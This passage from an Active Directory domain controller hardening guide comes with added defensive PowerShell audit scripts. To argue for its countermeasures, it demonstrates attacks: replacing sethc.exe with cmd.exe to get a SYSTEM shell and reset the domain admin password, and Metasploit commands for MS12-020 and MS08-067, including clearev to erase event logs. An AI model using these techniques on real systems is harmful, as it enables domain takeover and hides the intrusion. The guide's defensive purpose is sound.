Companies typically use machine models (templates) to deploy their physical and virtual servers. These templates often include multiple
components / applications that are useless on a domain controller and increase its attack surface.

It is very important to avoid adding services that would run in the context of the System account.
The latter has full administrative rights on the domain controller (including rights on all objects in the directory).

In some companies, the teams in charge of deploying servers may differ (different administration teams, outsourcing of some sites).
Deployment methodologies, and therefore server configurations, may vary accordingly.

For all these reasons, it is recommended to deploy domain controllers from an image (template) managed by the Active Directory
management team.

6.2 HOST DOMAIN CONTROLLERS IN A SECURE LOCATION

6.2.1 WHAT ARE THE RISKS IF AN ATTACKER HAS PHYSICAL ACCESS TO A DOMAIN CONTROLLER?

As explained in the Microsoft article http://blogs.technet.com/b/rhalbheer/archive/2011/06/16/tenimmutable-laws-of-security-version-2-0.aspx, if
an attacker has unrestricted physical access to your server, it's not your server anymore. The following demonstration illustrates this.

Start your domain controller from a Windows 2008 R2 or Windows 2012 R2 installation DVD. Select the option Repair your computer.

Then select Troubleshoot, then Command Prompt.

The C drive of the server appears as the D drive. Type the following commands in the
command prompt:

move d:\Windows\System32\sethc.exe d:\Windows\System32\sethc.old
copy d:\Windows\System32\cmd.exe d:\Windows\System32\sethc.exe

Then restart the server.

Upon restart, press the Shift key 5 times.

The command prompt launches as System. Type DSA.MSC.

The Active Directory Users and Computers console appears. Enable the console's Advanced Features view. You
can now reset the password of the domain administrator account (member of the Domain Admins and Enterprise Admins groups) because the
SYSTEM account has full control over the object. In the example above, the forest msreport.be is in Windows 2012 R2 native mode.

This technique gives full access to the directory and all its accounts. It is the first step before a more dangerous attack, which consists of
recovering the users' passwords from the NTHASH or LMHash.

To ensure the security of your directory, you must therefore prevent a user from starting your domain controller from a parallel OS (LiveCD) and
modifying Windows Server files and registry.

6.2.2 HOW TO PREVENT AN ATTACKER FROM ACCESSING THE NTDS.DIT FILE?

Microsoft supports the deployment of domain controllers on physical servers and on virtual machines. Microsoft's official support is handled through
the SVVP (Windows Server Virtualization Validation Program). I invite you to consult the following website:

http://www.windowsservercatalog.com/svvp.aspx
We therefore have to deal with the protection of both physical and virtual domain controllers.

The first step is of course to protect the server room against unauthorized access. Physical domain controllers must be hosted in a secure
server room. However, this measure does not apply to virtual domain controllers. Indeed, the hard disks of virtual machines are VHD files
(with Hyper-V) or VMDK files (VMware) that can be copied whether the virtual machine is on or off.

The table below shows the countermeasures applicable to physical and virtual domain controllers.

Countermeasure: Hosting the domain controller in a secure data center.
Note: This countermeasure applies to physical servers. You must disable booting from DVD / USB in the BIOS, which is not always possible.

Countermeasure: Encrypting the hard disk with BitLocker.
Note: BitLocker uses the TPM. This solution works for physical domain controllers but does not work for virtual machines, because the
latter cannot emulate a TPM. A password to be entered at startup will have to be used instead.

Countermeasure: Deploy an RODC.
Note: If you cannot host the domain controllers in a secure room and the risk of machine theft is very high, deploying an RODC
(Read Only Domain Controller) is required. This type of domain controller stores no passwords by default. You can configure the accounts
whose passwords are cached on the RODC. If the domain controller is compromised, you only need to change the passwords of those user
accounts. To function properly, you must have a Windows 2008 read / write domain controller in at least one Active Directory site. The update
http://www.microsoft.com/enus/download/details.aspx?id=7707 must be deployed on Windows XP / 2003 machines to enable the proper
functioning of authentication with an RODC.

The procedure to enable BitLocker on domain controllers (physical server and virtual machine) is presented in the appendix of this document.
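The RODC countermeasure above only pays off if, after a theft, you know exactly which accounts' secrets the RODC held. The following script is an added example written for this edit, not code from the original document or from Msreport: it lists the accounts revealed (cached) on each RODC with the real cmdlet Get-ADDomainControllerPasswordReplicationPolicyUsage and its -RevealedAccounts switch, and resets those user accounts when a RODC is reported compromised. It assumes the ActiveDirectory RSAT module and Domain Admins rights; the RODC name 'RODC01' in the usage lines is a placeholder and New-RandomPassword is a helper of my own.

```powershell
# Added example, not from the original document: audit the accounts revealed
# (cached) on each RODC and reset them if the RODC is lost.
# Assumes the ActiveDirectory RSAT module and Domain Admins rights.
Import-Module ActiveDirectory

function New-RandomPassword {
    # Helper (my own): cryptographically random password of $Length characters,
    # using rejection sampling so every character of the alphabet is equally likely.
    param([int]$Length = 24)
    $alphabet = [char[]]'ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz23456789!#%&*+-=?@'
    $limit    = 256 - (256 % $alphabet.Length)      # discard bytes >= limit to avoid modulo bias
    $rng      = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    $byte     = New-Object byte[] 1
    $chars    = New-Object System.Collections.Generic.List[char]
    while ($chars.Count -lt $Length) {
        $rng.GetBytes($byte)
        if ($byte[0] -lt $limit) { $chars.Add($alphabet[$byte[0] % $alphabet.Length]) }
    }
    ConvertTo-SecureString -String (-join $chars) -AsPlainText -Force
}

function Get-RodcRevealedAccounts {
    # One object per RODC listing the accounts whose passwords it currently holds.
    # Those are the only accounts that need a reset if that RODC is compromised.
    $rodcs = Get-ADDomainController -Filter { IsReadOnly -eq $true }
    foreach ($rodc in $rodcs) {
        $revealed = Get-ADDomainControllerPasswordReplicationPolicyUsage -Identity $rodc.Name -RevealedAccounts
        [pscustomobject]@{
            Rodc             = $rodc.HostName
            Site             = $rodc.Site
            RevealedCount    = @($revealed).Count
            RevealedAccounts = @($revealed | ForEach-Object SamAccountName)
        }
    }
}

function Reset-RodcRevealedPasswords {
    # Incident response for a stolen RODC: reset every revealed user account and
    # force a password change at next logon. Computer accounts and the RODC's own
    # krbtgt_* account are reported for manual follow-up instead of being reset blindly.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([Parameter(Mandatory)][string]$RodcName)

    $revealed = Get-ADDomainControllerPasswordReplicationPolicyUsage -Identity $RodcName -RevealedAccounts
    foreach ($account in $revealed) {
        if ($account.ObjectClass -ne 'user' -or $account.SamAccountName -like 'krbtgt*') {
            Write-Warning "Revealed on $RodcName, handle manually: $($account.DistinguishedName)"
            continue
        }
        if ($PSCmdlet.ShouldProcess($account.SamAccountName, "Reset password cached on $RodcName")) {
            Set-ADAccountPassword -Identity $account.DistinguishedName -Reset -NewPassword (New-RandomPassword -Length 24)
            Set-ADUser -Identity $account.DistinguishedName -ChangePasswordAtLogon $true
        }
    }
}

# Usage (RODC01 is a placeholder name):
# Get-RodcRevealedAccounts | Format-List
# Reset-RodcRevealedPasswords -RodcName 'RODC01' -WhatIf     # dry run first, then without -WhatIf
```

Run Get-RodcRevealedAccounts periodically and keep the output: a RevealedCount that keeps growing usually means the password replication policy allows more accounts than the site actually needs.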


6.3 DEPLOY THE SECURITY PATCHES ON DOMAIN CONTROLLERS

6.3.1 WHY IS IT NECESSARY TO DEPLOY THE SECURITY PATCHES?

Security vulnerabilities are programming defects that enable an attacker to divert the normal operation of the software in order to gain access to the system or to interrupt its operation (software crash).

Security vulnerabilities are often linked to defects in the handling of the parameters passed to the program: software written to receive a parameter of type INTEGER (whole number) receives a FLOAT (floating-point number) instead and stops working.

Deploying an antivirus will not protect you against the exploitation of security vulnerabilities (exploits) by an attacker. At best, it will detect the use of a known program that exploits the flaw (such as Incognito, Metasploit...).

Today it is very easy to download from the Internet tools like Metasploit, which incorporate thousands of exploits targeting the main software solutions used by companies.

Metasploit offers, through a console or a GUI, the ability to launch sophisticated attacks against Active Directory domain controllers. It allows for example, via the MS08-067 vulnerability, to take control of a Windows 2003 domain controller, or via the MS12-020 vulnerability, to crash (blue screen) a Windows 2008 R2 server.

I invite you to read the following articles, which list the most exploited critical flaws, and to follow the news feeds announcing new exploits.

https://community.rapid7.com/community/metasploit/blog/2012/12/11/exploit-trends-new-exploitsmake-the-top-10

https://community.rapid7.com/community/metasploit/blog
You can download Metasploit at this address:
http://www.rapid7.com/products/metasploit/download.jsp

Metasploit integrates an exploit based on the MS12-020 vulnerability that crashes a Windows 2008 R2 server that is not up to date. A step-by-step guide is available at this address:
http://www.metasploit.com/modules/auxiliary/dos/windows/rdp/ms12_020_maxchannelids

In an isolated network environment, install a Windows 2008 R2 virtual machine (not updated) and enable Remote Desktop. Get the IP address of this machine. In the Metasploit console, type the following commands:

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOST server_ip
run

Metasploit includes an exploit based on the vulnerability CVE-2008-4250 / MS08-067 which provides a SYSTEM command prompt. A step-by-step guide is available on the site:
http://www.metasploit.com/modules/exploit/windows/smb/ms08_067_netapi

In the Metasploit console, type the following commands:

use exploit/windows/smb/ms08_067_netapi
exploit

You then get a command prompt with SYSTEM rights.

The Server service (file sharing) crashes on the target machine. Type ? for the list of commands, getsystem to get SYSTEM rights and clearev to clear the event logs. Type getpid to get the PID of the Metasploit process on the target machine. Confirm in the Task Manager of the attacked machine that the process exists (see the PID column).

Type the command ps to list the processes on the target machine. Stop the process with the command kill PID-number.

You should always update the domain controllers (every month). Indeed, the risk of a failure caused by installing a patch is much lower than the risk of a failure caused by an attack or by an infection by a virus / worm exploiting a security hole.


6.3.2 INSTALLING SECURITY PATCHES ON DOMAIN CONTROLLERS

Today there are many free solutions (WSUS, Windows Update) or paid ones (LANDesk Management Suite, Dell KACE, System Center Configuration Manager (SCCM)...) that can handle the deployment of security patches.

Companies usually have a patch deployment solution but rarely check that the patches are actually deployed on the machines. However, many factors can block the deployment of patches. Administrators can forget to approve an essential fix. The fix may refuse to install if the WMI repository is corrupt, because the patch runs a WMI query to detect the patches already installed (http://msreport.free.fr/?p=459). A dependency required to install the hotfix may also be missing. It is therefore recommended to use a third-party tool such as MBSA (other than your deployment tool) to confirm that your domain controllers are up to date.

The deployment of security patches can sometimes generate failures / malfunctions. Microsoft has conducted numerous studies showing that systems that are not kept up to date encounter more outages / failures than up-to-date systems. Microsoft releases security patches on the second Tuesday of the month (US time). Regressions are usually detected after 2 to 3 days, and a version 2 of the patch is then provided by Microsoft or the patch is withdrawn. To reduce the risk of negative impact of a fix, you can deploy patches on pilot domain controllers on the second Thursday of each month and deploy patches on all other domain controllers on the third Tuesday of each month (a week after the release of the security patch).

The Windows Automatic Updates client tries to reboot automatically when the hotfix installation is complete. This behaviour can be a problem on production servers. It does not allow you to set the exact time at which the patches should be installed and the exact time of the restart. It has reduced functionality on Windows 2008 R1 and Windows 2008 R2 servers installed in Core mode. You can use a tool like WuInstall and create scheduled tasks with it to deploy patches on domain controllers. WuInstall can be downloaded at:
https://www.wuinstall.com
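The two points above (verify with something other than the deployment tool that patches really landed, and stagger pilot and full rollout around Patch Tuesday) can be scripted. The block below is an added example written for this edit, not code from the original document or from Msreport: it computes the calendar described in the text (Patch Tuesday, pilot DCs on the second Thursday, all DCs on the third Tuesday) and then asks every domain controller, through Get-HotFix, for its most recent hotfix. It assumes the ActiveDirectory RSAT module and WMI (DCOM) access to the domain controllers from the machine it runs on.

```powershell
# Added example, not from the original document: compute the patching calendar
# described above and check from a management workstation that every domain
# controller actually received a hotfix since Patch Tuesday.
# Assumes the ActiveDirectory RSAT module and WMI (DCOM) access to the DCs.
Import-Module ActiveDirectory

function Get-PatchCalendar {
    # Patch Tuesday is the second Tuesday of the month (US time).
    param([datetime]$Month = (Get-Date))
    $firstOfMonth  = $Month.Date.AddDays(1 - $Month.Day)
    $daysToTuesday = ([int][DayOfWeek]::Tuesday - [int]$firstOfMonth.DayOfWeek + 7) % 7
    $patchTuesday  = $firstOfMonth.AddDays($daysToTuesday + 7)
    [pscustomobject]@{
        PatchTuesday   = $patchTuesday
        PilotDcRollout = $patchTuesday.AddDays(2)   # second Thursday: pilot domain controllers
        AllDcRollout   = $patchTuesday.AddDays(7)   # third Tuesday: all other domain controllers
    }
}

function Get-DomainControllerPatchStatus {
    # Get-HotFix wraps Win32_QuickFixEngineering; a DC with no hotfix installed on
    # or after -Since is reported as not patched. Unreachable DCs are reported too,
    # never silently skipped: an unreachable DC is exactly the one the deployment missed.
    param(
        [datetime]$Since = (Get-PatchCalendar).PatchTuesday,
        [string[]]$ComputerName = (Get-ADDomainController -Filter * | ForEach-Object HostName)
    )
    foreach ($dc in $ComputerName) {
        try {
            $latest = Get-HotFix -ComputerName $dc -ErrorAction Stop |
                      Where-Object { $_.InstalledOn } |
                      Sort-Object InstalledOn -Descending |
                      Select-Object -First 1
            [pscustomobject]@{
                DomainController = $dc
                LatestHotfix     = $latest.HotFixID
                InstalledOn      = $latest.InstalledOn
                PatchedSince     = [bool]($latest -and $latest.InstalledOn -ge $Since)
                Error            = $null
            }
        } catch {
            [pscustomobject]@{
                DomainController = $dc
                LatestHotfix     = $null
                InstalledOn      = $null
                PatchedSince     = $false
                Error            = $_.Exception.Message
            }
        }
    }
}

# Usage:
# Get-PatchCalendar
# Get-DomainControllerPatchStatus | Where-Object { -not $_.PatchedSince } | Format-Table -AutoSize
```

Get-HotFix only sees updates recorded by the servicing stack, so treat a "not patched" result as a prompt to check the WSUS or SCCM console, not as proof; the value of the check is that it comes from a different source than the deployment tool, as the text recommends.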

6.4 REDUCE THE ATTACK SURFACE OF DOMAIN CONTROLLERS

To reduce the attack surface, deploy only the Windows roles and features (Server Manager) required on a domain controller. A domain controller only requires the Active Directory Domain Services role and the DNS role (unless DNS is handled by a third-party solution). On Windows 2012 R1 and later, the GUI is available as 2 optional features. The commands below show how to deploy the GUI on a server installed in Core mode:

Import-Module ServerManager
mkdir C:\mountdir
Get-WindowsImage -ImagePath D:\sources\install.wim
Mount-WindowsImage -ImagePath D:\sources\install.wim -Path C:\mountdir -Index 4 -ReadOnly
Install-WindowsFeature Server-Gui-Mgmt-Infra, Server-Gui-Shell -Restart -Source C:\mountdir\Windows\WinSxS

In Core mode (Server-Gui-Mgmt-Infra and Server-Gui-Shell not installed), it is possible to administer the server with PowerShell locally, or remotely (from another server) with the MMC consoles, Server Manager or PowerShell. One of the disadvantages of Core mode is that it is difficult to look at the event logs locally (with the PowerShell command Get-EventLog). Remote analysis of the event logs is not always possible if the link is too slow or if network access is cut.

Since Windows 2012 R1, it is possible to deploy the server in minimal server interface mode (Server-Gui-Mgmt-Infra feature installed). This mode allows you to run all the MMC consoles, but without the full graphical shell.

It is therefore recommended to deploy domain controllers running Windows 2012 R1 or later in minimal server interface mode, and to deploy only the Active Directory Domain Services and DNS roles on those machines.
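To check that a domain controller actually matches the recommendation just made (only the Active Directory Domain Services and DNS roles, minimal server interface), the following added example, written for this edit and not taken from the original document or from Msreport, compares the installed roles with an allowlist and reports which of the two optional GUI features are present. The allowlist is an assumption to adapt to your environment; the feature names are the ones Get-WindowsFeature uses and that appear in the commands above.

```powershell
# Added example, not from the original document: report the installed roles that
# are not on the allowlist recommended above, and the GUI level of the server.
# Assumes the ServerManager module (Windows 2012 or later).
Import-Module ServerManager

function Get-UnexpectedRoles {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        # Assumption: a DC needs only these two roles, as the text states.
        [string[]]$AllowedRoles = @('AD-Domain-Services', 'DNS')
    )
    # FeatureType 'Role' keeps the list to top-level roles and leaves out the many
    # dependent features (RSAT tools, Group Policy management...) AD DS pulls in.
    $installed = Get-WindowsFeature -ComputerName $ComputerName |
        Where-Object { $_.Installed -and $_.FeatureType -eq 'Role' }
    foreach ($role in $installed) {
        [pscustomobject]@{
            ComputerName = $ComputerName
            Role         = $role.Name
            DisplayName  = $role.DisplayName
            Allowed      = ($AllowedRoles -contains $role.Name)
        }
    }
}

function Get-GuiLevel {
    # The two optional GUI features from the text: none installed = Server Core,
    # Server-Gui-Mgmt-Infra only = minimal server interface, both = full GUI.
    param([string]$ComputerName = $env:COMPUTERNAME)
    $features = Get-WindowsFeature -Name Server-Gui-Mgmt-Infra, Server-Gui-Shell -ComputerName $ComputerName
    $mgmt  = ($features | Where-Object Name -eq 'Server-Gui-Mgmt-Infra').Installed
    $shell = ($features | Where-Object Name -eq 'Server-Gui-Shell').Installed
    if ($shell)    { 'Full GUI' }
    elseif ($mgmt) { 'Minimal Server Interface' }
    else           { 'Server Core' }
}

# Usage from a management server, across all domain controllers:
# Import-Module ActiveDirectory
# Get-ADDomainController -Filter * | ForEach-Object {
#     Get-UnexpectedRoles -ComputerName $_.HostName | Where-Object { -not $_.Allowed }
#     Get-GuiLevel -ComputerName $_.HostName
# }
```

Expect the default File and Storage Services role (FileAndStorage-Services) to show up as not allowed on a stock Windows 2012 R2 install; whether it stays is a decision to make explicitly rather than by default, which is the point of the audit.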

6.5 NEVER STOP THE WINDOWS FIREWALL SERVICE

Since Windows Vista / Windows 2008 R1, the Windows Firewall is enabled by default. This firewall integrates many features, as explained in the article http://technet.microsoft.com/enus/library/cc753180.aspx. The Windows Firewall is a stateful firewall: it keeps the state of all TCP and UDP connections and can dynamically create rules to allow legitimate inbound / outbound traffic (for example the response to an HTTP request, the code of the web page, returned by the web server to the client).

The Windows Firewall allows you to create rules filtering incoming and outgoing traffic based on a program (allow all the traffic of this application...), a port or an IP address. It also includes a set of predefined rules that allow the proper operation of the Windows roles and features deployed on the server.

When a server becomes a domain controller (after deployment of the Active Directory Domain Services role), the predefined rule group Active Directory Domain Services is activated in the Windows Firewall. The inbound and outbound rules below are then enabled.

An application developed for Windows 2008 / Vista and later can automatically create and enable rules in the Windows Firewall if needed (for the smooth operation of the program). It is relatively rare to have to create a rule manually.

The Windows Firewall has 3 profiles for connections: Public, Private and Domain. Specific rules may apply to only one profile. If you are in a workgroup, the firewall asks you at startup whether you want to apply the rules of the Public or Private firewall profile. If you are a member of an Active Directory domain, the rules of the Domain profile apply when you are connected to the corporate network (otherwise, the system asks if you want to be in the Public or Private profile). This mode allows you to create rules that apply only when the user is working from home or from a public Internet connection.

The Windows Firewall can be managed from the control panel (Control Panel | Windows Firewall) or via the console Windows Firewall with Advanced Security. Always configure the firewall from the console Windows Firewall with Advanced Security!

Indeed, on Windows 2008 R1, the control panel only offered to disable the firewall for the current profile. When deploying Windows 2008 R1, administrators often disabled the firewall from the control panel while the machine was still in a workgroup. They therefore disabled the firewall for the Public or Private profile. When the server was joined to the domain, the firewall switched to the Domain profile and was active again. This interface problem was corrected with Windows 7 / Windows 2008 R2.

If you want to disable the firewall on Windows Server 2008 (and later), you must not stop the Windows Firewall service. This is not supported by Microsoft and breaks the following features: the ability to encapsulate traffic in IPsec and Windows Service Hardening. To stop the firewall, set the Public, Private and Domain profiles to the state Off.

This is also true for Windows workstations!

Windows Service Hardening helps protect Windows services that run in the context of highly privileged accounts. This feature is explained in detail in the articles below and in the chapter "Access management with Active Directory" of this document:

http://blogs.technet.com/b/askperf/archive/2008/02/03/ws2008-windows-service-hardening.aspx
http://blogs.msdn.com/b/sql_protocols/archive/2009/09/21/connection-from-a-windows-service-couldbe-blocked-by-firewall-even-if-firewall-is-disabled.aspx
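The rule of this section (the service stays running, the profiles are what you switch) can be enforced with the NetSecurity cmdlets. The block below is an added example written for this edit, not code from the original document or from Msreport: it reports the firewall service state, any profile set to Off, and how many rules of the predefined Active Directory Domain Services group are enabled, then brings disabled profiles back to On and restarts the service if someone stopped it. It assumes Windows 2012 / Windows 8 or later, where Get-NetFirewallProfile exists; the service name MpsSvc is the Windows Firewall service.

```powershell
# Added example, not from the original document: verify that the Windows Firewall
# service runs and that all three profiles are enabled, and fix a profile that was
# switched Off without ever stopping the service (which the text says must not be done).
# Assumes the NetSecurity module (Windows 2012 / 8 or later).

function Test-FirewallPosture {
    $service  = Get-Service -Name MpsSvc
    $profiles = Get-NetFirewallProfile
    $adRules  = Get-NetFirewallRule -DisplayGroup 'Active Directory Domain Services' -ErrorAction SilentlyContinue
    [pscustomobject]@{
        ComputerName     = $env:COMPUTERNAME
        ServiceRunning   = ($service.Status -eq 'Running')
        # Enabled is a GpoBoolean enum; compare its text form to stay unambiguous.
        DisabledProfiles = @($profiles | Where-Object { "$($_.Enabled)" -ne 'True' } | ForEach-Object Name)
        AdDsRulesEnabled = @($adRules | Where-Object { "$($_.Enabled)" -eq 'True' }).Count
        AdDsRulesTotal   = @($adRules).Count
    }
}

function Repair-FirewallPosture {
    # Re-enables profiles set to Off and restarts the service if it was stopped.
    # Supports -WhatIf so the change can be previewed on a production DC.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param()
    $state = Test-FirewallPosture
    if (-not $state.ServiceRunning) {
        if ($PSCmdlet.ShouldProcess('MpsSvc', 'Start Windows Firewall service')) {
            Set-Service -Name MpsSvc -StartupType Automatic
            Start-Service -Name MpsSvc
        }
    }
    foreach ($name in $state.DisabledProfiles) {
        if ($PSCmdlet.ShouldProcess($name, 'Enable firewall profile')) {
            Set-NetFirewallProfile -Name $name -Enabled True
        }
    }
    Test-FirewallPosture
}

# Usage:
# Test-FirewallPosture
# Repair-FirewallPosture -WhatIf
```

AdDsRulesEnabled equal to AdDsRulesTotal is what you should see on a domain controller; a lower number means someone disabled individual rules of the predefined group, which is worth investigating before re-enabling them.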

6.6 CONFIGURING UAC

UAC (User Account Control) under Windows is a set of security components that allows, among others:

Protecting certain files and registry locations:

Creating a file at the root of drive C: is, for example, restricted. The administrator no longer has access to certain folders and gets the following message: You don't currently have permission to access this folder. Click Continue to permanently get access to this folder. This can cause problems if the administrator clicks Continue, because the permissions on the folder are then modified to give access to the user account. This problem is explained in the Microsoft article: http://support.microsoft.com/kb/950934/en-us

Generating two access tokens:

An access token with all the user's privileges and SIDs is generated. A second token is generated with reduced rights (removal of groups such as the Administrators SID). The user can use the unfiltered token only after elevation (confirmation window, or the user has run the application as administrator).

Enabling Internet Explorer Protected Mode:

UAC must be enabled for Internet Explorer Protected Mode to be active. This ensures that no ActiveX control (or other script running in Internet Explorer) can make a change to the system.

By default, UAC is disabled for the Administrator account (the account created by default by Windows) and enabled for all other user accounts. It can only be disabled by Group Policy (GPO) for the other users who are administrators of the machine.

If you disable UAC via Control Panel | Users Accounts | Change User Account Control Settings, UAC is not completely disabled in Windows. If you try to stop a service from the command prompt, you get the message Access is denied.

UAC is disabled by default on a server deployed in Core mode or in minimal server interface mode (no full graphical interface).

The Microsoft article http://support.microsoft.com/kb/2526083 explains that UAC can be disabled on a machine where only administrators can log on. You could therefore disable UAC on domain controllers. Personally, I prefer to keep UAC, but the 2 following settings are acceptable for domain controllers:

• Completely disable UAC: this also disables Internet Explorer Protected Mode.
• Partially disable UAC (equivalent to level 1 of UAC in Control Panel | Users Accounts | Change User Account Control Settings).

Tips for working on a Windows 2012 R2 machine with UAC active:

Start a PowerShell command prompt as administrator, then launch all programs such as regedt32 from that PowerShell prompt. Unfortunately this trick does not work for Windows Explorer.

To launch Explorer as an administrator, you must use another trick, described on this website:
https://social.technet.microsoft.com/Forums/windows/en-US/1798a1a7-bd2e-4e42-8e980bc715e7f641/unable-to-open-an-elevated-windows-explorer-window

Launch the Task Manager. End the explorer.exe process. Then start Explorer.exe, ticking the box Create this task with administrative privileges. It works: you get an unrestricted Explorer and the folder permissions are no longer modified.

6.7 DISABLE OFFLINE LOGON CACHING

When a user logs on, the logon credentials (login / password) are cached on the machine under HKEY_LOCAL_MACHINE\SECURITY\CACHE. By default, only the System account has the right to view the content of this key. This allows, for example, a user with a laptop to log on when not connected to the corporate network. This mode of operation is not applicable to servers and fixed workstations. For this reason and for security reasons, I invite you to disable logon caching on all machines except laptops.

The following article explains how to retrieve the cached passwords on Windows 2000 / XP:
http://www.passcape.com/domain_cached_passwords

To disable the caching of user logons via GPO, you must define the following parameters:
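The screenshot that followed in the original is not reproduced here. The GPO setting in question is the security option "Interactive logon: Number of previous logons to cache (in case domain controller is not available)", which writes the REG_SZ value CachedLogonsCount under the Winlogon key (default 10, 0 disables the cache). The script below is an added example written for this edit, not code from the original document or from Msreport: it reads the effective value, decides compliance with the rule above (laptops may cache, servers and fixed workstations must not), and can set the local value. Laptop detection through Win32_ComputerSystem.PCSystemType (2 = Mobile) is my assumption for a reasonable heuristic.

```powershell
# Added example, not from the original document: audit and set the number of cached
# domain logons. The security option "Interactive logon: Number of previous logons to
# cache" writes the REG_SZ value CachedLogonsCount (default 10; 0 disables caching).
$WinlogonKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-CachedLogonSetting {
    $value = (Get-ItemProperty -Path $WinlogonKey -Name CachedLogonsCount -ErrorAction SilentlyContinue).CachedLogonsCount
    $count = if ($null -eq $value) { 10 } else { [int]$value }    # absent value = Windows default of 10
    # Assumption: PCSystemType 2 (Mobile) identifies the laptops that are allowed to keep a cache.
    $system   = Get-CimInstance -ClassName Win32_ComputerSystem
    $isLaptop = ($system.PCSystemType -eq 2)
    [pscustomobject]@{
        ComputerName      = $env:COMPUTERNAME
        CachedLogonsCount = $count
        IsLaptop          = $isLaptop
        # Servers and fixed workstations must not cache logons; laptops may.
        Compliant         = $isLaptop -or ($count -eq 0)
    }
}

function Set-CachedLogonsCount {
    # Local equivalent of the GPO setting. Prefer the GPO in production so that
    # the value is enforced and re-applied if someone changes it by hand.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([ValidateRange(0, 50)][int]$Count = 0)
    if ($PSCmdlet.ShouldProcess($WinlogonKey, "Set CachedLogonsCount to $Count")) {
        # The value is a REG_SZ holding a number, so it is written as a string.
        Set-ItemProperty -Path $WinlogonKey -Name CachedLogonsCount -Value "$Count" -Type String
    }
}

# Usage:
# Get-CachedLogonSetting
# if (-not (Get-CachedLogonSetting).Compliant) { Set-CachedLogonsCount -Count 0 -WhatIf }
```

Setting the value to 0 on a laptop means its user cannot log on with domain credentials while away from the network, which is why the rule in the text exempts laptops and why the compliance check does too.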

6.8 STRENGTHENING REMOTE DESKTOP SECURITY

I invite you to read the following document https://www.sstic.org/media/SSTIC2012/SSTICactes/securite_rdp/SSTIC2012-Article-securite_rdp-ebalard_bordes_rig

which explains in detail how the RDP protocol works and how to configure it securely. The following recommendations are taken from this guide and from a Microsoft document that lists the security best practices for Active Directory (available here: http://aka.ms/bpsad).

6.8.1 USING ADMINISTRATION WORKSTATIONS

Whenever possible, you should minimize direct Remote Desktop (TSE) connections to the domain controllers. Active Directory administration must be done from administration machines running Windows 2008 R1 or later. These machines must only host Active Directory administration tools such as Active Directory Users and Computers, Active Directory Administrative Center and the Active Directory module for PowerShell. Internet access from the administration machines must be restricted (forbidden if possible). These machines must be housed in secure premises to protect them against theft. As a reminder, attacks such as Pass the NTLM Hash, or tools such as Incognito, could allow a user who has stolen an administration machine to perform a privilege escalation (recover access to user accounts with privileges on Active Directory). For the same reason, it is not recommended to administer Active Directory from standard, non-secured workstations. To achieve this, you need to restrict the machines on which the user accounts with administrative privileges can log on.

You can also block network access to all machines (other than the administration stations and domain controllers) for the Active Directory administrative accounts. This can be implemented with the GPO setting Deny access to this computer from the network.

6.8.2 CONFIGURING THE REMOTE DESKTOP SERVICE

If you have administration machines running Windows 2003 Server:

Whenever possible, migrate to Windows 2008 R2 or later. If this is not possible, you must deploy Service Pack 1 (Service Pack 2 recommended) on the Windows 2003 machine, generate a computer certificate from an external certification authority or a Microsoft Enterprise certification authority (see the deployment procedure in the appendix) and then apply the recommendations of the following article: http://support.microsoft.com/kb/895433/en-us

If you have administration machines running Windows 2008 or later:

RDP access is done over TLS. However, these machines use a self-signed certificate. You must generate a computer certificate for each administration machine with an external certification authority or a Microsoft Enterprise certification authority (see the deployment procedure in the appendix).

Then configure Remote Desktop with the correct settings. This can be done in the Remote tab of Control Panel | System. Check the boxes Allow remote connections to this computer and Allow only connections from computers running Remote Desktop with Network Level Authentication.

Go to the properties of the user account, tab Account, then click Log On To and check the box The following computers. Enter the list of machines on which the user can open a session. The underlying attribute holds up to 1024 values. An alternative to this method is to configure the GPO setting Deny log on locally with a user group whose members are all the user accounts with administrative privileges on the directory.
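The Log On To restriction just described, and the requirement of 6.8.1 that privileged accounts only log on from administration machines, is tedious to apply by hand account by account. The block below is an added example written for this edit, not code from the original document or from Msreport: it enumerates the members of Domain Admins and Enterprise Admins, writes the allowed workstation list into the attribute behind the Log On To dialog (exposed by the ActiveDirectory module as -LogonWorkstations, a comma-separated list of NetBIOS names), and audits which privileged accounts are still unrestricted. The workstation names ADMIN-WS01 and ADMIN-WS02 are placeholders; the script assumes the ActiveDirectory RSAT module and rights to modify the accounts. Enterprise Admins only exists in the forest root domain, so that lookup is allowed to fail silently elsewhere.

```powershell
# Added example, not from the original document: restrict every privileged account
# to the administration workstations, and audit the ones still unrestricted.
# Assumes the ActiveDirectory RSAT module; station names below are placeholders.
Import-Module ActiveDirectory

$AdminStations = @('ADMIN-WS01', 'ADMIN-WS02')   # placeholder NetBIOS names of the admin workstations

function Get-PrivilegedUsers {
    # Recursive membership of the two groups named in the text, without duplicates.
    # Enterprise Admins exists only in the forest root domain, hence SilentlyContinue.
    param([string[]]$Groups = @('Domain Admins', 'Enterprise Admins'))
    $seen = @{}
    foreach ($group in $Groups) {
        $members = Get-ADGroupMember -Identity $group -Recursive -ErrorAction SilentlyContinue |
                   Where-Object objectClass -eq 'user'
        foreach ($member in $members) {
            if (-not $seen.ContainsKey($member.DistinguishedName)) {
                $seen[$member.DistinguishedName] = $true
                Get-ADUser -Identity $member.DistinguishedName -Properties LogonWorkstations
            }
        }
    }
}

function Set-AdminLogonWorkstations {
    # Writes the "Log On To" list (userWorkstations attribute) for each privileged user.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([string[]]$Workstations = $AdminStations)
    if ($Workstations.Count -gt 1024) { throw 'The underlying attribute holds at most 1024 entries.' }
    $list = $Workstations -join ','
    foreach ($user in Get-PrivilegedUsers) {
        if ($user.LogonWorkstations -eq $list) { continue }   # already compliant, nothing to change
        if ($PSCmdlet.ShouldProcess($user.SamAccountName, "Restrict logon to: $list")) {
            Set-ADUser -Identity $user.DistinguishedName -LogonWorkstations $list
        }
    }
}

function Get-UnrestrictedAdmins {
    # Audit: privileged accounts that can still log on from any machine.
    Get-PrivilegedUsers |
        Where-Object { [string]::IsNullOrEmpty($_.LogonWorkstations) } |
        Select-Object SamAccountName, DistinguishedName
}

# Usage:
# Get-UnrestrictedAdmins
# Set-AdminLogonWorkstations -WhatIf      # preview, then run without -WhatIf
```

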